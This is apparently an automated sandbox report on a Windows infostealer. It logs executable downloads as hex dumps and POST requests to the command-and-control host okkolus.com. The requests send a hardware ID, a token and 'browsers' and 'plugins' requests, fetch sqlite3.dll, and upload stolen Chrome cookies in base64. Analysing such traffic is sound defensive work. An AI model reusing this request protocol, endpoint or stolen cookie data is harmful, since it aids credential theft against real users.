b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:56 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "6dde8-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 450024Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "1f3950-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 2046288Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:53:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "3ef50-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 257872Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:53:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "13bf0-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 80880Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAFHost: okkolus.comContent-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 38 34 39 30 35 36 38 30 36 31 32 37 38 39 35 37 33 32 30 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 75 6e 69 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 2d 2d 0d 0a Data Ascii: ------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="hwid"A884905680612789573209------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="build"unik------EHJDGHJDBFIJKECAECAF--
                      Source: global trafficHTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJKEBGHJKFIDGCAAFCAHost: okkolus.comContent-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 2d 2d 0d 0a Data Ascii: ------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="message"browsers------KJJKEBGHJKFIDGCAAFCA--
                      Source: global trafficHTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJECHost: okkolus.comContent-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 2d 2d 0d 0a Data Ascii: ------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="message"plugins------AEBGIEGCFHCFHIDHIJEC--
                      Source: global trafficHTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCGHDGIEGCBFIEGCBHost: okkolus.comContent-Length: 6247Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dfaf16606234b71d/sqlite3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAFCAFCBKFHJJJKKFHHost: okkolus.comContent-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 2d 2d 0d 0a Data Ascii: ------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3
